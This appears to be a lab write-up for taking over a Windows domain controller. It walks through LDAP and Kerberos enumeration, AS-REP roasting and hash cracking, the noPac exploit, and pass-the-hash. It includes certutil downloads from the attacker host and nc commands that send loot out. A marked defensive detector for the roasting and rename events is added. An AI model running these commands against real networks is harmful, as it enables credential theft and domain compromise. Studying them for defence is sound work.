After a period of regular privilege escalation attempts, I realized that I had made a mistake, but it also made me more impressed and eager to try.
Seriously, you'll find it fun
Machine IP: 172.31.3.3
My IP: 10.10.0.82

### Port information

```
Open 172.31.3.3:53
Open 172.31.3.3:88
Open 172.31.3.3:135
Open 172.31.3.3:139
Open 172.31.3.3:389
Open 172.31.3.3:445
Open 172.31.3.3:464
Open 172.31.3.3:593
Open 172.31.3.3:636
Open 172.31.3.3:3389
Open 172.31.3.3:5985
Open 172.31.3.3:9389
Open 172.31.3.3:47001
Open 172.31.3.3:49664
Open 172.31.3.3:49665
Open 172.31.3.3:49666
Open 172.31.3.3:49668
Open 172.31.3.3:49671
Open 172.31.3.3:49675
Open 172.31.3.3:49674
Open 172.31.3.3:49682
Open 172.31.3.3:49699
Open 172.31.3.3:49704
```
### Port 389 information

I find that the LDAP port 389 is open, so the first thing I decide to do is collect the LDAP information:

```
ldapsearch -x -s base namingcontexts -h 172.31.3.3
```

Next I need to collect usernames, or at least DC information.
### Port 445

Running `enum4linux 172.31.3.3` reveals the names brute-DC and brute; add them to /etc/hosts. Now we can use kerbrute to enumerate existing users:

```
./kerbrute userenum -d brute.csl /lab_test/windows_privilege/tryhard_cyber/brute/old/user --dc 172.31.3.3
```

We find four users, and I test whether any of them are vulnerable to AS-REP roasting:

```
impacket-GetNPUsers brute.csl/ -usersfile user -dc-ip 172.31.3.3 -format hashcat
```

We get the hash of the user tess; crack it:

```
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
```

I try impacket-GetUserSPNs and impacket-secretsdump, but both fail. Let's run smbmap and see if we find something? Nothing valuable, but I can log in to the tess account with evil-winrm.
### Privilege to administrator, way 1

noPac -> CVE-2021-42278

```
python3 noPac.py brute.csl/tess:Unique1 -dc-ip 172.31.3.3 --impersonate administrator -use-ldap -dump -just-dc-user administrator
evil-winrm -i 172.31.3.3 -u 'administrator' -H e2068a39ee8150b697797d6c3e513df7
```
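Added here as a defender's counterpart to the AS-REP roasting step (port 445 section) and the noPac step above; this is example code written for this page, not part of the original writeup. It runs two checks over constructed Security-log records: a successful 4768 with no pre-authentication and RC4 (the AS-REP that hashcat mode 18200 cracks), and a 4781 that renames a machine account to a name without a trailing `$` (the sAMAccountName spoofing behind CVE-2021-42278). The JSON-lines layout and all sample values are assumptions.

```python
import json

# Constructed, simplified Security-log records as JSON lines; the field names
# follow the EventData of 4768 (TGT requested) and 4781 (account renamed).
SAMPLE_EVENTS = """
{"EventID": 4768, "TargetUserName": "tess", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.0.82"}
{"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "172.31.3.50"}
{"EventID": 4768, "TargetUserName": "nosuchuser", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x6", "IpAddress": "172.31.3.51"}
{"EventID": 4781, "OldTargetUserName": "WS01$", "NewTargetUserName": "BRUTE-DC", "SubjectUserName": "tess"}
{"EventID": 4781, "OldTargetUserName": "WS02$", "NewTargetUserName": "WS03$", "SubjectUserName": "admin"}
"""


def is_asrep_roast(ev):
    """Successful 4768 with pre-auth type 0 (none) and RC4 (0x17): the KDC
    handed out an AS-REP that can be cracked offline. A failed request
    (Status != 0x0, e.g. unknown user) issues no ticket and must not alert."""
    return (ev.get("EventID") == 4768
            and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType") == "0x17")


def is_nopac_rename(ev):
    """4781 where a machine account (sAMAccountName ending in '$') is renamed
    to a name without '$': a computer account masquerading as a user or DC."""
    if ev.get("EventID") != 4781:
        return False
    old = ev.get("OldTargetUserName", "")
    new = ev.get("NewTargetUserName", "")
    return old.endswith("$") and not new.endswith("$")


def scan(jsonl):
    """Return (rule, subject, detail) tuples for every matching record."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if is_asrep_roast(ev):
            alerts.append(("asrep_roast", ev["TargetUserName"], ev["IpAddress"]))
        elif is_nopac_rename(ev):
            alerts.append(("nopac_rename", ev["SubjectUserName"],
                           f"{ev['OldTargetUserName']} -> {ev['NewTargetUserName']}"))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

In a real deployment the AS-REP rule should be paired with the list of accounts that legitimately have "Do not require Kerberos preauthentication" set, since each hit is also a prompt to remove that flag.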
### Privilege to
```
certutil -urlcache -split -f http://10.10.0.82:82/SharpHound.exe
cmd.exe /c "winPEASany.exe > a.txt"                 # on the lab machine
cmd.exe /c "nc.exe 10.10.0.82 9001 < a.txt"         # on the lab machine
nc -lvvp 9001 > peas.txt                             # on the attacker's machine
cmd.exe /c "SharpHound.exe -c all"
cmd.exe /c "nc.exe 10.10.0.82 9001 < 20220113052032_BloodHound.zip"
nc -lvvp 9001 > blod.zip
```

`C:\Users\All Users\ntuser.pol`
### Beyond root: pass the hash

```
impacket-getTGT brute.csl/administrator -hashes e2068a39ee8150b697797d6c3e513df7:e2068a39ee8150b697797d6c3e513df7
export KRB5CCNAME=./administrator_brute-dc.brute.csl.ccache
```